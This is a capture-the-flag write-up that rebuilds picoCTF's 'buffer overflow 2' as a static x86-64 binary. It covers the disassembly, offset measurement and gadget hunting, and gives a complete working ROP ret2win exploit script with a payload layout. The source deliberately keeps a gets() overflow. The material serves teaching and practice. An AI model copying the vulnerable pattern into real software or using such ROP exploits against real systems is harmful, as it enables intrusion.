Ret2win the long way: rebuilding picoCTF "buffer overflow 2" when the sandbox won't give you 32 bits
picoCTF's *buffer overflow 2* is a beginner stack-smash whose entire lesson is "learn to pass arguments to the function you hijack." The intended binary is 32-bit, where arguments ride the stack. My sandbox has no 32-bit toolchain and can't reach the artifact server — so I rebuilt the exact challenge logic as a statically-linked x86-64 ELF and discovered the lesson gets *richer*: with no `pop rdi` in the program's own code, you go gadget-mining in the linked-in libc.
Provenance: read this first
I want to be honest about what this binary is before I disassemble a single byte, because the integrity of a pwn writeup lives or dies on whether the artefact is what you say it is.
The target for this post is not the official picoCTF binary pulled off artifacts.picoctf.net. It couldn't be. My analysis box is network-isolated behind an allowlist proxy, and every route to the live challenge was closed:
$ curl -sS -I https://play.picoctf.org/
HTTP/2 403 # Cloudflare bot-wall; no browser available in this sandbox
$ curl -sS -I https://artifacts.picoctf.net/
curl: (56) CONNECT tunnel failed, response 403
Server: squid/5.7 # artifact host not on the proxy allowlist
$ for h in kali.download deb.debian.org archive.ubuntu.com; do curl -I http://$h/; done
curl: (6) Could not resolve host: kali.download
curl: (6) Could not resolve host: deb.debian.org # apt mirrors unreachable too
So I did the next most honest thing: I reconstructed the challenge from its publicly documented form. buffer overflow 2 ships its own vuln.c source on the challenge page; the program is tiny and famous, and its shape is not a secret — a win(arg1, arg2) function that prints flag.txt only when called with two magic constants, plus a gets() overflow in vuln(). I wrote that source, compiled it with picoCTF's standard mitigation flags, and did all the reverse-engineering and exploitation against the ELF I produced. Every offset, every gadget, every register value below is real, measured against the binary whose SHA-256 I publish. I never read a writeup or official solution; the work is the point.
One forced deviation, explained in full in its own section: the original is 32-bit, and this sandbox has neither a 32-bit toolchain (no multilib Scrt1.o/crti.o) nor a 32-bit loader to run a dynamically-linked i386 ELF. So this is an x86-64 build. That changes the exploit from "stack-stuffed cdecl dwords" to "ROP gadgets that load rdi/rsi," and I'll teach both.
The target
$ file vuln
vuln: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux),
statically linked, BuildID[sha1]=07d39161..., not stripped
$ sha256sum vuln vuln.c flag.txt
6ccb535fb7dcfebb0abfa9b29e040127b03bd9b91d3dcc9bfb75ef35470a36a3 vuln
3ff50c43bb9adb2f2987bba4814763642ed82b3773b80fc6e7603c585437075a vuln.c
9d9b5b99cda7da05cf18fbe0da807818f7c528194ae0ca0c06ae81797bd5390f flag.txt
The first 64 bytes, because in a pwn post the bytes matter:
$ xxd -l 64 vuln
00000000: 7f45 4c46 0201 0103 0000 0000 0000 0000 .ELF............
00000010: 0200 3e00 0100 0000 e017 4000 0000 0000 ..>.......@.....
00000020: 4000 0000 0000 0000 c0d9 0b00 0000 0000 @...............
00000030: 0000 0000 4000 3800 0b00 4000 1c00 1b00 ....@.8...@.....
e0 17 40 00 at offset 0x18 is the entry point 0x4017e0; 0200 3e00 is ET_EXEC / EM_X86_64. readelf agrees and, crucially, tells us this is a fixed-address executable:
$ readelf -h vuln
Type: EXEC (Executable file)
Machine: Advanced Micro Devices X86-64
Entry point address: 0x4017e0
EXEC, not DYN. No PIE. The image is mapped at a fixed base of 0x400000, so .text and everything in it sit at constant virtual addresses. That single fact is what makes the entire exploit a hardcode-the-addresses affair rather than a leak-then-compute affair.
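The header fields quoted above can also be pulled out of those 64 bytes mechanically. The following is a minimal sketch using only Python's struct module; the hex string is the xxd dump retyped by hand, and the dictionary keys follow the usual ELF64 header field names. Treat it as an illustration of the layout, not a replacement for readelf.

```python
import struct

# First 64 bytes of vuln, retyped from the xxd dump above.
HEADER_HEX = (
    "7f454c46020101030000000000000000"
    "02003e0001000000e017400000000000"
    "4000000000000000c0d90b0000000000"
    "00000000400038000b0040001c001b00"
)

# ELF64 header: 16-byte e_ident followed by little-endian fixed-width fields.
ELF64_EHDR = struct.Struct("<16sHHIQQQIHHHHHH")
FIELDS = (
    "e_ident", "e_type", "e_machine", "e_version", "e_entry", "e_phoff",
    "e_shoff", "e_flags", "e_ehsize", "e_phentsize", "e_phnum",
    "e_shentsize", "e_shnum", "e_shstrndx",
)

def parse_elf64_header(raw: bytes) -> dict:
    """Unpack a 64-byte ELF64 header into a field-name -> value mapping."""
    if raw[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    return dict(zip(FIELDS, ELF64_EHDR.unpack(raw[:ELF64_EHDR.size])))

hdr = parse_elf64_header(bytes.fromhex(HEADER_HEX))
print("type    :", hdr["e_type"], "(2 = ET_EXEC, 3 = ET_DYN)")
print("machine :", hdr["e_machine"], "(62 = EM_X86_64)")
print("entry   :", hex(hdr["e_entry"]))
```

An e_type of 2 (ET_EXEC) is the same "No PIE" fact readelf reports; a PIE build would show 3 (ET_DYN) here.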
First impressions: checksec, and a deliberate gotcha
$ pwn checksec ./vuln
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
Stripped: No
Three of these are exactly what you want for a teaching ret2win:
- NX enabled: the stack is non-executable, so the "drop shellcode in the buffer and jump to it" approach is dead. We must reuse code that's already mapped executable. (This is why the challenge is a ret2win and not a "Handy Shellcode.")
- No PIE: win() and our gadgets sit at constant addresses we can bake straight into the payload.
- No canary… except checksec says "Canary found." That is a heuristic false positive, and it's worth dwelling on because it's the kind of thing that makes a beginner distrust their own eyes.
checksec decides "canary" by looking for the symbol __stack_chk_fail. In a statically-linked binary, glibc's own functions are linked into the image, and plenty of them are built with stack protection — so the symbol is present even though my functions were compiled -fno-stack-protector. The way to settle it is to stop trusting the heuristic and read the function that actually overflows. Here's vuln() in full — there is no canary load, no xor against fs:0x28, no __stack_chk_fail epilogue:
; objdump -d -M intel (vuln @ 0x4019a6, static build, sha256 6ccb535f...)
00000000004019a6 <vuln>:
4019a6: push rbp
4019a7: mov rbp,rsp
4019aa: sub rsp,0x70 ; 112-byte stack frame
4019ae: lea rax,[rbp-0x70] ; rax = &buf
4019b2: mov rdi,rax
4019b5: call 40a910 <_IO_gets> ; gets(buf) <-- unbounded read
4019ba: lea rax,[rbp-0x70]
4019be: mov rdi,rax
4019c1: call 40ab10 <_IO_puts> ; puts(buf)
4019c6: nop
4019c7: leave ; mov rsp,rbp ; pop rbp
4019c8: ret ; <-- the hijack point
radare2 6.1.7 sees the same frame and labels the single stack variable for us:
$ r2 -q -c 'aa; pdf @ sym.vuln' vuln
┌ 35: sym.vuln ();
│ afv: vars(1:sp[0x78..0x78])
│ 0x004019a6 55 push rbp
│ 0x004019aa 4883ec70 sub rsp, 0x70
│ 0x004019b5 e8568f0000 call sym.gets ; char *gets(char *s)
│ 0x004019c1 e84a910000 call sym.puts ; int puts(const char *s)
│ 0x004019c8 c3 ret
One stack variable, a gets into it, no canary in the prologue or epilogue. checksec was wrong about this function; the disassembly is the ground truth. Lesson logged.
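The per-function check can be scripted roughly as follows. This is a sketch under stated assumptions: it searches one function's disassembly text (objdump, Intel syntax) for the two markers discussed above, the function name has_canary_markers is my own, and PROTECTED_SAMPLE is a made-up snippet included only to show the positive case.

```python
# Textual markers a stack-protected function normally contains:
# the canary load from fs:0x28 and the failure handler call.
CANARY_MARKERS = ("fs:0x28", "__stack_chk_fail")

# vuln() as disassembled above.
VULN_DISASM = """\
4019a6: push rbp
4019a7: mov rbp,rsp
4019aa: sub rsp,0x70
4019ae: lea rax,[rbp-0x70]
4019b2: mov rdi,rax
4019b5: call 40a910 <_IO_gets>
4019ba: lea rax,[rbp-0x70]
4019be: mov rdi,rax
4019c1: call 40ab10 <_IO_puts>
4019c6: nop
4019c7: leave
4019c8: ret
"""

# Hypothetical fragment of a protected function, for contrast only.
PROTECTED_SAMPLE = """\
mov rax,QWORD PTR fs:0x28
mov QWORD PTR [rbp-0x8],rax
call __stack_chk_fail
"""

def has_canary_markers(disasm: str) -> bool:
    """Return True if the disassembly text mentions any canary marker."""
    return any(marker in disasm for marker in CANARY_MARKERS)

print(has_canary_markers(VULN_DISASM))       # False
print(has_canary_markers(PROTECTED_SAMPLE))  # True
```

This is still a heuristic, just a narrower one: it asks the question of the function that overflows rather than of the whole statically-linked image.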
The source
This is the vuln.c I authored to reconstruct the challenge (SHA-256 3ff50c43...), kept faithful to the published challenge logic — magic constants 0xCAFEF00D/0xF00DF00D, gets() overflow, win() printing flag.txt:
/* vuln.c — reconstruction of picoCTF "buffer overflow 2" logic */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
extern char *gets(char *);
#define BUFSIZE 100
#define FLAGSIZE 64
void win(unsigned int arg1, unsigned int arg2) {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) { printf("Please create 'flag.txt' ...\n"); exit(0); }
fgets(buf,FLAGSIZE,f);
if (arg1 != 0xCAFEF00D) return;
if (arg2 != 0xF00DF00D) return;
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}
Compiled with:
$ gcc -fno-stack-protector -no-pie -static -O0 -w vuln.c -o vuln
ld: warning: the `gets' function is dangerous and should not be used.
-fno-stack-protector (no canary), -no-pie (fixed addresses), -static (more on why below), -O0 (readable frames). Note that glibc 2.42 still ships gets() in its static library even though current headers no longer declare it (hence the manual extern in the source), so the original dangerous call survives intact: the linker warning is the only complaint, and the binary builds.
Two things to notice in win() that drive the whole exploit:
- win() takes two unsigned int arguments and only reaches the flag-printing printf when arg1 == 0xCAFEF00D and arg2 == 0xF00DF00D. Reaching win is not enough; you must reach it with the right arguments. That's the entire difficulty bump over buffer overflow 1.
- printf(buf): the flag is printed with printf(flag) (a format-string smell), but it's incidental here; the flag has no %, so it prints verbatim.
Static pass: win() annotated
Here is win() in full from the static build. I've commented every load-bearing block:
; objdump -d -M intel (win @ 0x401905, static build, sha256 6ccb535f...)
0000000000401905 <win>:
401905: push rbp
401906: mov rbp,rsp
401909: sub rsp,0x60
40190d: mov DWORD PTR [rbp-0x54],edi ; save arg1 (edi) to stack
401910: mov DWORD PTR [rbp-0x58],esi ; save arg2 (esi) to stack
401913: lea rdx,[rip+0x786f6] ; "r"
40191a: lea rax,[rip+0x786f1] ; "flag.txt"
401921: mov rsi,rdx
401924: mov rdi,rax
401927: call 40a760 <_IO_new_fopen> ; fopen("flag.txt","r")
40192c: mov QWORD PTR [rbp-0x8],rax
401930: cmp QWORD PTR [rbp-0x8],0x0
401935: jne 401966 <win+0x61> ; file opened? skip error path
... ; (error path: printf + exit)
401966: mov rdx,QWORD PTR [rbp-0x8]
40196a: lea rax,[rbp-0x50]
40196e: mov esi,0x40 ; 64
401973: mov rdi,rax
401976: call 40a450 <_IO_fgets> ; fgets(buf,64,f)
40197b: cmp DWORD PTR [rbp-0x54],0xcafef00d ; arg1 == 0xCAFEF00D ?
401982: jne 4019a0 <win+0x9b>
401984: cmp DWORD PTR [rbp-0x58],0xf00df00d ; arg2 == 0xF00DF00D ?
40198b: jne 4019a3 <win+0x9e>
40198d: lea rax,[rbp-0x50]
401991: mov rdi,rax
401994: mov eax,0x0
401999: call 404a90 <_IO_printf> ; printf(flag) <-- the win
40199e: jmp 4019a4 <win+0x9f>
4019a0: nop
4019a3: nop
4019a4: leave
4019a5: ret
The two instructions at 0x40190d/0x401910 are the crux. On entry, win immediately copies edi→[rbp-0x54] and esi→[rbp-0x58], and the later cmp instructions test those saved copies. So I only need edi/esi to hold the magics at the instant win is entered. After that, fopen/fgets are free to clobber the registers — the comparison reads memory, not registers. (This detail bites people who set the registers and then panic when a breakpoint shows them garbage by the time of the cmp. They were correct at entry; that's all that matters.)
In x86-64 SysV, the first integer argument is in rdi (low 32 bits edi) and the second in rsi (esi). So the job is: set rdi = 0xCAFEF00D, rsi = 0xF00DF00D, then transfer control to 0x401905.
For completeness, main() just wires up unbuffered stdout, drops privileges with setresgid, prints the prompt, and calls vuln:
; objdump -d -M intel (main @ 0x4019c9, static build)
0000000000401a17: lea rax,[rip+...] ; "Please enter your string: "
0000000000401a1e: call 40ab10 <_IO_puts>
0000000000401a23: call 4019a6 <vuln> ; the only call into the vulnerable fn
Finding the offset (don't guess — measure)
vuln does sub rsp,0x70 and buf lives at [rbp-0x70]. Arithmetic says the saved return address is 0x70 (112) bytes of buffer + 8 bytes of saved RBP = 120 bytes past the start of buf. But arithmetic is a hypothesis; the debugger is the experiment. I fed a De Bruijn (cyclic) pattern and watched where it landed at the ret:
$ python3 -c "from pwn import *; open('/tmp/cyc.txt','wb').write(cyclic(200,n=8))"
$ gdb -q -batch -ex 'run < /tmp/cyc.txt' -ex 'x/gx $rsp' ./vuln
Program received signal SIGSEGV, Segmentation fault.
0x00000000004019c8 in vuln () ; faulted *at* vuln's ret
0x7ffd17bb9d18: 0x6161616161616170 ; value sitting on top of stack = "paaaaaaa"
The 8 bytes about to be popped into RIP are "paaaaaaa". Feed that back to pwntools and it resolves the position:
$ python3 -c "from pwn import *; print(cyclic_find(0x6161616161616170, n=8))"
120
120, exactly matching 0x70 + 8. Now I control RIP, and everything downstream is layout.
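For readers without pwntools, the same measurement idea can be sketched with the standard library alone. This is not pwntools' De Bruijn sequence; it is a simpler stand-in pattern of my own in which every 8-byte slot spells its own offset in ASCII hex, so whatever qword lands in RIP names its position directly. The helper names are hypothetical.

```python
import struct

SLOT = 8  # size of one stack slot on x86-64

def marker_pattern(length: int) -> bytes:
    """Build a pattern where each 8-byte slot is its own offset as 8 hex digits.

    Only ASCII hex digits are emitted, so gets() never sees a newline.
    """
    slots = (length + SLOT - 1) // SLOT
    return b"".join(b"%08x" % (i * SLOT) for i in range(slots))[:length]

def offset_from_qword(value: int) -> int:
    """Turn the little-endian qword seen at the faulting ret back into an offset."""
    return int(struct.pack("<Q", value), 16)

pattern = marker_pattern(200)

# What gdb's x/gx would show if the return address slot is 120 bytes in:
(observed,) = struct.unpack_from("<Q", pattern, 0x70 + 8)
print(offset_from_qword(observed))               # 120

# Decoding the qword from the real cyclic run shown above:
print(struct.pack("<Q", 0x6161616161616170))     # b'paaaaaaa'
```

The second print shows why gdb's 0x6161616161616170 corresponds to the string "paaaaaaa": the value is stored little-endian, so the low byte 0x70 ('p') comes first in memory.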
The 32-bit lesson vs the 64-bit reality
This is the section the title promised. The original picoCTF buffer overflow 2 is a 32-bit binary, and on 32-bit (cdecl), function arguments are passed on the stack, pushed right-to-left, sitting just above the return address. So the intended exploit is gloriously gadget-free:
[ 112 bytes padding ] ; fill buf + saved EBP (32-bit offset is 0x70 in the real one)
[ &win ] ; overwrite saved EIP -> jump to win
[ fake return ] ; where win "returns" to afterwards (anything, e.g. main/exit)
[ 0xCAFEF00D ] ; win's arg1 -> [esp+4] at entry
[ 0xF00DF00D ] ; win's arg2 -> [esp+8] at entry
You don't load any registers. You don't need a single ROP gadget. The four-dword tail is the calling convention. That's the elegant beginner insight the challenge is built to teach.
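As a sketch, the 32-bit layout above translates to a few lines of Python. Two values here are assumptions, because I could not build or fetch a 32-bit binary: WIN_32 is a placeholder address (substitute the one from your own build), and FAKE_RET is an arbitrary filler. Only the 112-byte offset and the two magics come from the text above.

```python
import struct

OFFSET_32 = 112          # padding up to saved EIP, as quoted in the layout above
WIN_32 = 0x0804ABCD      # PLACEHOLDER: address of win() in your 32-bit build
FAKE_RET = 0x42424242    # arbitrary: where win() would "return" to
ARG1 = 0xCAFEF00D
ARG2 = 0xF00DF00D

def p32(value: int) -> bytes:
    """Pack a 32-bit little-endian dword."""
    return struct.pack("<I", value)

payload32 = (
    b"A" * OFFSET_32   # fill buf + saved EBP
    + p32(WIN_32)      # overwrite saved EIP
    + p32(FAKE_RET)    # sits at [esp] when win starts
    + p32(ARG1)        # [esp+4] at win's entry
    + p32(ARG2)        # [esp+8] at win's entry
)

print(len(payload32))            # 128
print(payload32[-8:].hex())      # 0df0feca0df00df0
```

No gadget addresses appear anywhere: the four trailing dwords are laid out exactly as a real caller would have left them.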
On x86-64, that trick evaporates. Arguments go in registers (rdi, rsi, …), not on the stack, so simply stacking the magics after &win does nothing — win reads edi/esi, which still hold whatever puts left behind. To put values into registers from a stack-controlled context, you need ROP gadgets: short instruction sequences ending in ret that pop stack data into the registers you want. The exploit grows a small chain.
So why did I build static? Because I first built the obvious dynamic x86-64 binary and went looking for pop rdi ; ret:
$ ROPgadget --binary vuln_dynamic | grep -iE 'pop (rdi|rsi)'
(nothing — only:) 0x000000000040118d : pop rbp ; ret
Modern gcc + glibc ≥ 2.34 no longer emit the old __libc_csu_init function, which historically donated the canonical pop rdi ; ret / pop rsi ; pop r15 ; ret pair to every dynamically-linked binary. Without it, the program's own code in a small dynamic binary has no register-loading gadgets at all. To pass arguments you'd need a libc gadget — which means leaking libc first — which for a "beginner" lab is the wrong difficulty entirely, and which is itself blocked by the lack of a pop rdi to drive the leak. Catch-22.
Static linking breaks the deadlock honestly: the whole of glibc is now inside the image at fixed (No-PIE) addresses, and glibc's machine code is a goldmine of byte sequences that happen to decode as useful gadgets. So the static 64-bit build restores the beginner shape of the challenge — an all-in-one-binary ROP — while staying faithful to the "you must supply the two arguments" lesson.
Gadget hunting
ROPgadget finds 36,462 unique gadgets in the static binary. I need exactly two:
$ ROPgadget --binary vuln | grep -E ': (pop rdi ; ret|pop rsi ; ret|pop rsi ; pop r15 ; ret)$'
0x0000000000402338 : pop rdi ; ret
0x0000000000402336 : pop rsi ; pop r15 ; ret
0x0000000000409c28 : pop rsi ; ret
I want the cleanest ones — pop rdi ; ret and a pop rsi ; ret with no extra pop to account for. Both exist. The interesting part is where they live. These are unintended gadgets: they aren't functions, they're byte sequences sitting in the middle of unrelated glibc code that happen to align into 5f c3 / 5e c3:
$ objdump -d -M intel vuln (showing raw bytes at the gadget addresses)
0000000000402338 <get_common_cache_info.constprop.0+0x148>:
402338: 5f pop rdi
402339: c3 ret
0000000000409c28 <__parse_one_specmb+0x448>:
409c28: 5e pop rsi
409c29: c3 ret
0x402338 is +0x148 into glibc's CPU cache-detection routine; 0x409c28 is +0x448 into glibc's printf format parser. Neither function "wants" to be a gadget — the 5f/5e opcodes are operand bytes or instruction tails that the CPU is happy to start decoding from if you jump there. That's the whole magic of ROP: the executable is a giant alphabet of ret-terminated fragments, and you spell your program out of them.
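The "alphabet" idea can be illustrated with a deliberately naive scanner. This is a sketch, not how ROPgadget works internally: it only does raw byte matching for three hard-coded patterns, and the four-byte blob is the encoding implied by the ROPgadget output above (pop rsi ; pop r15 ; ret at 0x402336 assembles to 5e 41 5f c3). The function name find_gadgets is my own.

```python
# Byte encodings of the gadgets of interest.
GADGETS = {
    "pop rdi ; ret": bytes.fromhex("5fc3"),
    "pop rsi ; ret": bytes.fromhex("5ec3"),
    "pop rsi ; pop r15 ; ret": bytes.fromhex("5e415fc3"),
}

def find_gadgets(blob: bytes, base: int) -> list:
    """Return sorted (address, name) pairs for every pattern occurrence in blob."""
    hits = []
    for name, pattern in GADGETS.items():
        start = blob.find(pattern)
        while start != -1:
            hits.append((base + start, name))
            start = blob.find(pattern, start + 1)
    return sorted(hits)

# The four bytes at 0x402336, reconstructed from the gadget listing.
blob = bytes.fromhex("5e415fc3")
for address, name in find_gadgets(blob, base=0x402336):
    print(hex(address), ":", name)
# 0x402336 : pop rsi ; pop r15 ; ret
# 0x402338 : pop rdi ; ret
```

The same four bytes yield two gadgets: entering two bytes late skips the 0x41 prefix, and what was the tail of pop r15 decodes as pop rdi. That overlap is why the two addresses in the ROPgadget output differ by exactly 2.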
The gadget byte c3 (ret) is what lets a chain proceed: each gadget does its one job, then ret pops the next gadget address off our controlled stack. The control flow hops gadget → gadget → win.
The exploit
This is solve.py in full. It encodes only what the static analysis told us — offset 120, two gadgets, win, two magic constants:
#!/usr/bin/env python3
# ret2win exploit for the reconstructed picoCTF "buffer overflow 2" (x86-64 static build)
# Target: /labs-output/artifacts/vuln sha256 6ccb535f...a36a3
from pwn import *
context.binary = elf = ELF("/labs-output/artifacts/vuln", checksec=False)
context.log_level = "info"
# --- constants recovered by static analysis ---------------------------------
OFFSET = 120 # buf[112] + saved RBP[8] (vuln: sub rsp,0x70)
WIN = 0x401905 # win() -> prints flag.txt iff edi/esi match magics
POP_RDI = 0x402338 # pop rdi ; ret
POP_RSI = 0x409c28 # pop rsi ; ret
ARG1 = 0xcafef00d # required value of edi (win: cmp DWORD [rbp-0x54])
ARG2 = 0xf00df00d # required value of esi (win: cmp DWORD [rbp-0x58])
def build():
    chain = b"A" * OFFSET # fill buf + saved RBP, up to the return address
    chain += p64(POP_RDI) # +0 gadget: pop rdi ; ret
    chain += p64(ARG1) # +8 -> rdi = 0xCAFEF00D
    chain += p64(POP_RSI) # +16 gadget: pop rsi ; ret
    chain += p64(ARG2) # +24 -> rsi = 0xF00DF00D
    chain += p64(WIN) # +32 ret2win, with both args now in place
    return chain

def main():
    payload = build()
    log.info("payload length: %d bytes", len(payload))
    io = process([elf.path])
    io.sendline(payload)
    io.recvuntil(b"Please enter your string:")
    data = io.recvall(timeout=2)
    for line in data.split(b"\n"):
        if b"picoCTF{" in line:
            log.success("FLAG: %s", line.strip().decode())

if __name__ == "__main__":
    main()
Running it against the binary (with a local flag.txt containing a debugging flag, exactly as picoCTF instructs you to do for offline testing):
$ python3 solve.py
[*] payload length: 160 bytes
[+] Starting local process '/labs-output/artifacts/vuln': pid 1403
[+] Receiving all data: Done (166B)
[*] Process '/labs-output/artifacts/vuln' stopped with exit code -11 (SIGSEGV)
[+] FLAG: picoCTF{r3sb04rd_4n6_5l1pp3ry_70a09498}
The flag is recovered. The SIGSEGV at the end is expected and harmless: after win finishes its printf it executes leave ; ret and returns into the leftover bytes on the stack (there's no valid return address there — we never needed one because the flag already printed). The crash happens strictly after the payoff. Documenting it rather than hiding it: it is not a failure, it's the natural end of a ret2win that doesn't bother to return cleanly.
Worked example: the payload, byte by byte
160 bytes total. Here's the entire layout with the role of every 8-byte slot:
| Offset | Bytes (hex) | Meaning |
|---|---|---|
| 0–111 | 41…41 (112×A) | fill buf[100] + alignment padding up to saved RBP |
| 112–119 | 41…41 (8×A) | overwrite saved RBP (value irrelevant) |
| 120 | 38 23 40 00 00 00 00 00 | → RIP: address of pop rdi ; ret (0x402338) |
| 128 | 0d f0 fe ca 00 00 00 00 | popped into rdi → 0xCAFEF00D |
| 136 | 28 9c 40 00 00 00 00 00 | address of pop rsi ; ret (0x409c28) |
| 144 | 0d f0 0d f0 00 00 00 00 | popped into rsi → 0xF00DF00D |
| 152 | 05 19 40 00 00 00 00 00 | address of win() (0x401905) |
Now trace it through the CPU, slot by slot. The interesting moment is vuln's epilogue. leave is mov rsp,rbp ; pop rbp; since we overwrote saved RBP with AAAAAAAA, RBP becomes garbage (harmless — win rebuilds its own frame), and rsp advances to point at offset 120:
vuln: leave ; ret
-> rsp = &payload[120]; ret pops 0x402338 -> RIP = pop_rdi gadget, rsp = &payload[128]
0x402338: pop rdi ; ret
-> rdi = payload[128] = 0x00000000CAFEF00D, rsp = &payload[136]
-> ret pops 0x409c28 -> RIP = pop_rsi gadget, rsp = &payload[144]
0x409c28: pop rsi ; ret
-> rsi = payload[144] = 0x00000000F00DF00D, rsp = &payload[152]
-> ret pops 0x401905 -> RIP = win, rsp = &payload[160]
0x401905: win() entry, with rdi=0xCAFEF00D, rsi=0xF00DF00D
401905 push rbp ; mov rbp,rsp ; sub rsp,0x60
40190d mov [rbp-0x54], edi ; saves 0xCAFEF00D
401910 mov [rbp-0x58], esi ; saves 0xF00DF00D
401927 fopen("flag.txt") ; clobbers rdi/rsi — doesn't matter, already saved
401976 fgets(buf, 64, f)
40197b cmp [rbp-0x54], 0xCAFEF00D -> EQUAL (jne not taken)
401984 cmp [rbp-0x58], 0xF00DF00D -> EQUAL (jne not taken)
401999 printf(buf) ; FLAG PRINTED
The magics only need to be correct at win's entry; they're immediately spilled to [rbp-0x54]/[rbp-0x58], and that spilled copy is what the cmps read.
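The trace above can be replayed in a toy model. This is a sketch that understands only the two "pop reg ; ret" gadgets from this post and treats the payload as the stack; it is not an emulator, and the simulate helper is my own naming. The addresses and constants are the ones measured above.

```python
import struct

OFFSET = 120
POP_RDI, POP_RSI, WIN = 0x402338, 0x409C28, 0x401905
ARG1, ARG2 = 0xCAFEF00D, 0xF00DF00D

payload = b"A" * OFFSET + struct.pack("<5Q", POP_RDI, ARG1, POP_RSI, ARG2, WIN)

def simulate(payload: bytes, offset: int):
    """Replay vuln's ret and each 'pop reg ; ret' gadget over the payload."""
    gadget_reg = {POP_RDI: "rdi", POP_RSI: "rsi"}
    regs = {}
    sp = offset  # index into payload standing in for rsp

    def pop() -> int:
        nonlocal sp
        (value,) = struct.unpack_from("<Q", payload, sp)
        sp += 8
        return value

    rip = pop()                        # vuln's ret
    while rip in gadget_reg:
        regs[gadget_reg[rip]] = pop()  # the gadget's pop
        rip = pop()                    # the gadget's ret
    return rip, regs, sp

rip, regs, sp = simulate(payload, OFFSET)
print(hex(rip), {name: hex(value) for name, value in regs.items()}, sp)
# 0x401905 {'rdi': '0xcafef00d', 'rsi': '0xf00df00d'} 160
```

The final sp of 160 matches the trace: by the time win starts, every byte of the payload has been consumed.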
Did it really land? gdb register evidence
Talk is cheap; here's the breakpoint at the first cmp (0x40197b), dumping the saved-argument slots while the exploit runs:
$ gdb -q -batch -ex 'break *0x40197b' -ex 'run < /tmp/payload.bin' \
-ex 'printf "edi(live)=%#x esi(live)=%#x\n", $edi, $esi' \
-ex 'printf "[rbp-0x54]=%#x [rbp-0x58]=%#x\n", \
*(unsigned int*)($rbp-0x54), *(unsigned int*)($rbp-0x58)' \
-ex 'continue' ./vuln
Breakpoint 1, 0x000000000040197b in win ()
edi(live)=0x679e6bb9 esi(live)=0x325a3c51 ; clobbered by fopen/fgets
[rbp-0x54]=0xcafef00d [rbp-0x58]=0xf00df00d ; the saved copies — exact magics
picoCTF{r3sb04rd_4n6_5l1pp3ry_70a09498}
This is the whole exploit in one frame. The live edi/esi are garbage at the cmp (precisely because fopen/fgets ran in between) — and yet [rbp-0x54]/[rbp-0x58] hold 0xcafef00d/0xf00df00d, because our gadgets set them at entry and win spilled them before clobbering the registers. The jnes aren't taken; the flag prints.
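The gdb session reads /tmp/payload.bin, which solve.py as listed never writes to disk. A minimal sketch for producing that file with the standard library only; the path is taken from the gdb command above, the constants are the ones from solve.py, and the helper names are my own.

```python
import struct

OFFSET = 120
POP_RDI, POP_RSI, WIN = 0x402338, 0x409C28, 0x401905
ARG1, ARG2 = 0xCAFEF00D, 0xF00DF00D

def build_payload() -> bytes:
    """Same 160-byte chain as solve.py, built with struct instead of pwntools."""
    chain = struct.pack("<5Q", POP_RDI, ARG1, POP_RSI, ARG2, WIN)
    return b"A" * OFFSET + chain

def write_payload(path: str) -> int:
    """Write the payload plus a trailing newline so gets() returns; return bytes written."""
    data = build_payload() + b"\n"
    with open(path, "wb") as handle:
        handle.write(data)
    return len(data)

payload = build_payload()

if __name__ == "__main__":
    print(write_payload("/tmp/payload.bin"), "bytes written")
```

One sanity check worth keeping in mind: none of the payload bytes is 0x0a, so gets() copies the whole chain before it stops at the appended newline.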
The stack-alignment aside (a thing I checked, not assumed)
64-bit ret2win has a famous footgun: the SysV ABI requires rsp to be 16-byte aligned at the point of a call, and glibc's printf/fopen internally use SSE instructions like movaps [rsp+...], xmm0 that fault (SIGSEGV) if the stack is misaligned. The standard prophylactic is to drop a bare ret gadget into the chain to nudge rsp by 8 and fix parity.
I didn't want to ship a gadget that does nothing, so I A/B-tested it — same chain, with and without an extra 0x401016 (ret) inserted before the gadgets:
$ python3 - <<run-summary
WITHOUT alignment ret -> flag? True
WITH alignment ret -> flag? True
run-summary
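Both succeed. One precision is worth stating. The cyclic run earlier showed the return-address slot at an address ending in 0x8, so the canonical five-qword chain enters win with rsp at a multiple of 16. A normal call leaves rsp 8 bytes past a 16-byte boundary at function entry (the pushed return address accounts for the difference), so by the ABI's own arithmetic it is the variant with the extra ret that is conventionally aligned. The canonical chain works anyway, presumably because nothing win reaches in this build performs an alignment-checked access on the stack. Since the A/B run shows the realignment ret is unnecessary here, I left it out of the canonical solve.py rather than carry a no-op. The takeaway is not "alignment doesn't matter"; it's "verify alignment instead of cargo-culting a ret; sometimes you need it, sometimes you don't, and the debugger will tell you which."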
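The alignment arithmetic behind that check can be written down directly. This sketch takes the return-slot address from the cyclic-pattern gdb run earlier (0x7ffd17bb9d18; the absolute value changes under ASLR, but its low four bits should not) and counts how many qwords each chain variant consumes. The helper name is my own, and the code says nothing about whether a given glibc path actually faults; only the A/B run answers that.

```python
RET_SLOT = 0x7FFD17BB9D18  # address of the saved return address, from the gdb run

def rsp_at_final_entry(ret_slot: int, chain_qwords: int) -> int:
    """rsp once the last chain entry (win) has been popped into RIP."""
    return ret_slot + 8 * chain_qwords

canonical = rsp_at_final_entry(RET_SLOT, 5)  # pop rdi, arg1, pop rsi, arg2, win
with_ret = rsp_at_final_entry(RET_SLOT, 6)   # same chain plus one bare ret

# A function reached by a real call starts with rsp % 16 == 8,
# because the call pushed 8 bytes onto a 16-byte-aligned stack.
print(hex(canonical), canonical % 16)  # 0x7ffd17bb9d40 0
print(hex(with_ret), with_ret % 16)    # 0x7ffd17bb9d48 8
```

Each extra bare ret flips the result between 0 and 8, which is why a single ret is the usual fix when a chain does crash inside an SSE instruction.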
Mitigations recap — what was present, what was missing, and why it mattered
| Mitigation | State | Consequence for the exploit |
|---|---|---|
| Stack canary | Absent in vuln() (checksec's "found" is a static-libc false positive) | We can overwrite the return address with a linear gets overflow; no canary to leak/forge |
| NX (DEP) | Enabled | Can't execute the buffer; forces code-reuse (ret2win/ROP) instead of shellcode |
| PIE / ASLR of image | Disabled (ET_EXEC @ 0x400000) | win and all gadgets are at fixed addresses: hardcode them, no leak needed |
